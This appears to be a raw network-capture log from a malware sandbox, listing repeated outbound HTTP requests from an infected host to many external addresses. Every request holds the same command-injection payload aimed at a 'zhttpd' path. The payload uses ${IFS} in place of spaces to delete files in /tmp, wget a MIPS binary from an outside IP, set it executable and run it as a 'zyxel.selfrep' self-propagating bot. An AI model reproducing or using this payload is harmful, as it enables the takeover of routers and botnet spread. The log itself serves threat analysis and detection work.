                                                  Jan 19, 2024 18:24:15.445605040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9161192.168.2.134475246.36.214.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445631981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9162192.168.2.1353892132.91.16.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445657969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9163192.168.2.1358942191.101.179.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445708990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9164192.168.2.1340032200.43.17.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445744991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9165192.168.2.1345830211.185.51.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445791006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9166192.168.2.134847620.20.21.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445818901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9167192.168.2.1355870154.9.109.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445849895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9168192.168.2.134348845.18.32.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445907116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9169192.168.2.133436069.99.177.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445919991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9170192.168.2.135002431.246.199.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.445998907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9171192.168.2.1344720146.160.62.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446041107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9172192.168.2.1343094210.12.94.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446110010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9173192.168.2.1343466192.214.185.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446135044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9174192.168.2.1352768191.62.2.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446170092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9175192.168.2.135061819.179.74.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446217060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9176192.168.2.133814213.44.188.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446263075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9177192.168.2.135238072.157.81.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446300030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9178192.168.2.134070046.80.190.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446336031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9179192.168.2.13410005.197.158.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446386099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9180192.168.2.135699480.90.91.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446422100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9181192.168.2.1356522150.55.173.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446444988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9182192.168.2.1341472103.96.89.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446476936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9183192.168.2.1353374131.162.168.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446536064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9184192.168.2.135304283.143.94.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446571112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9185192.168.2.1354074164.187.230.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446607113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9186192.168.2.135443694.217.170.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446643114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9187192.168.2.1352932175.237.160.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446712017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9188192.168.2.1343540105.80.75.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446748018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9189192.168.2.1345862102.56.140.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446805000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9190192.168.2.1342188200.194.174.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446832895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9191192.168.2.1337710140.67.32.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446888924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192192.168.2.135110882.97.47.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446926117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9193192.168.2.1341124198.7.201.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446949959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9194192.168.2.1333274192.187.147.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.446986914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9195192.168.2.1337560105.44.217.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447035074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9196192.168.2.133615268.136.152.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447065115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9197192.168.2.1349708158.194.116.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447098970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9198192.168.2.133659048.105.54.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447149038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9199192.168.2.135188066.246.78.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447201967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9200192.168.2.1357438116.184.3.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447225094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9201192.168.2.135336232.39.115.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447288036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9202192.168.2.13429788.162.25.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447316885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9203192.168.2.135310636.247.12.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447367907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9204192.168.2.1351116223.234.117.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447411060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9205192.168.2.134727083.120.169.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447458029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9206192.168.2.133776819.93.11.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447508097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9207192.168.2.135409851.26.19.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447559118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9208192.168.2.13505729.218.63.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447602034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9209192.168.2.1336578121.13.142.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447663069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9210192.168.2.1334480117.79.237.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447679996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9211192.168.2.135265866.86.72.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447721004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9212192.168.2.13442628.133.241.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447748899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9213192.168.2.1335740148.8.95.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447791100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9214192.168.2.1343964191.250.144.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447841883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9215192.168.2.1349728196.76.14.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447870970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9216192.168.2.1353564204.169.161.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447925091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9217192.168.2.134299485.99.107.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447962999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9218192.168.2.1344844144.223.64.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.447987080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9219192.168.2.135107670.71.237.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448028088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9220192.168.2.1333762177.157.121.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448080063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9221192.168.2.133567227.21.48.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448108912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9222192.168.2.1348116100.245.82.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:15.448139906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9223192.168.2.134371241.56.113.161443
                                                  TimestampBytes transferredDirectionData
